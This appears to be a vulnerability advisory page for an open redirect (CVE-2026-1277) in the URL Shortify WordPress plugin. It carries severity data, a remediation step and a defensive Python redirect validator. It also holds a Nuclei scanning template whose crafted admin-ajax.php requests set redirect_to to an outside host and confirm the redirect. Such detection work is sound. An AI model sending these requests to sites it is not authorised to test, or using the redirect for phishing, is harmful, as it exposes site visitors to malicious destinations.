
URL Shortify <= 1.12.1 - Open Redirect

CVE-2026-1277
Verified

Description

The URL Shortify plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.
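The weakness described here (CWE-601) comes down to a redirect handler that forwards wherever 'redirect_to' points. The following is an added example, not code from the advisory or from the URL Shortify plugin, showing the check that closes the gap: a stand-alone Python re-implementation of the idea behind WordPress' wp_safe_redirect()/wp_validate_redirect(), which only honours targets that stay on the site's own host and otherwise falls back to a fixed location. SITE_HOST and the fallback path are constructed values; the edge cases handled (scheme-relative "//host", backslash and triple-slash variants, userinfo tricks, non-HTTP schemes) are the forms the template's Location-header matcher also looks for.

```python
"""
Added example (not part of the advisory or of the URL Shortify plugin):
same-origin validation of a user-supplied redirect target, the check whose
absence CWE-601 describes.  Re-implements the intent of WordPress'
wp_safe_redirect()/wp_validate_redirect(); it is not the WordPress code.
"""
from urllib.parse import urlsplit

# Hypothetical site host; in WordPress this would be derived from home_url().
SITE_HOST = "shop.example"  # constructed value


def validate_redirect(redirect_to: str, fallback: str = "/wp-admin/") -> str:
    """Return redirect_to only if it stays on SITE_HOST, otherwise fallback."""
    if not redirect_to:
        return fallback

    candidate = redirect_to.strip()

    # Reject control characters (tabs, CR/LF) that browsers strip or that
    # could split the response header.
    if any(ord(ch) < 0x20 for ch in candidate):
        return fallback

    # Browsers treat a backslash like a forward slash in the authority
    # position, so "/\evil.example" would leave the site.  Normalise first.
    candidate = candidate.replace("\\", "/")

    # "///evil.example" resolves like "//evil.example"; collapse the run of
    # leading slashes so urlsplit sees the authority the browser would see.
    if candidate.startswith("//"):
        candidate = "//" + candidate.lstrip("/")

    parts = urlsplit(candidate)

    if parts.netloc:
        # Absolute or scheme-relative URL: only http(s) on our own host.
        if parts.scheme not in ("", "http", "https"):
            return fallback
        # .hostname drops any "user@" prefix, so "https://shop.example@evil"
        # is judged by its real host, evil.
        host = parts.hostname or ""
        if host.lower() != SITE_HOST:
            return fallback
        return candidate

    # No authority: must be a site-relative path, not "javascript:..." etc.
    if parts.scheme or not candidate.startswith("/"):
        return fallback
    return candidate


def location_header(redirect_to: str) -> str:
    """Build the Location header a hardened dismissal handler would emit."""
    return "Location: " + validate_redirect(redirect_to)


if __name__ == "__main__":
    # Constructed sample inputs, including the off-site forms the template's
    # matcher recognises; none of the off-site ones survive validation.
    for sample in (
        "/wp-admin/admin.php?page=us_settings",
        "https://shop.example/wp-admin/",
        "https://interact.sh",
        "//interact.sh",
        "/\\interact.sh",
        "///interact.sh",
        "https://shop.example@interact.sh/",
        "javascript:alert(1)",
    ):
        print(f"{sample!r:45} -> {location_header(sample)}")
```

The two accepted inputs in the demonstration loop are the site-relative path and the absolute URL on SITE_HOST; every other form falls back to /wp-admin/.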

Severity

Medium

CVSS Score

4.7

Exploit Probability

0%

Published Date

March 16, 2026

Template Author

shivam kamboj

CVE-2026-1277.yaml
id: CVE-2026-1277

info:
  name: URL Shortify <= 1.12.1 - Open Redirect
  author: Shivam Kamboj
  severity: medium
  description: |
    The URL Shortify plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.
  impact: |
    Unauthenticated attackers can redirect users to malicious sites, facilitating phishing or malware distribution.
  remediation: |
    Update to the latest version beyond 1.12.1.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/url-shortify/url-shortify-1121-unauthenticated-open-redirect-via-redirect-to-parameter
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1277
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2026-1277
    epss-score: 0.00339
    epss-percentile: 0.56752
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/url-shortify/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,redirect,url-shortify,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=bfcm_2025_offer&redirect_to=https://interact.sh"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&kc_us_dismiss_admin_notice=1&option_name=welcome_offer&redirect_to=https://interact.sh"

    stop-at-first-match: true

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 490a0046304402206b283875e1a9b260d5f3b9786310fc9ccba1e20fa8533ca5809ac8f3492fee7b0220072d6fa69c927f7b474ce9e093c0c1f7d8bfd27f896cd608c35adb47df1b2b29:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N
CVE ID: CVE-2026-1277
CWE ID: CWE-601

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/url-shortify/url-shortify-1121-unauthenticated-open-redirect-via-redirect-to-parameter
https://nvd.nist.gov/vuln/detail/CVE-2026-1277

Remediation Steps

Update to the latest version beyond 1.12.1.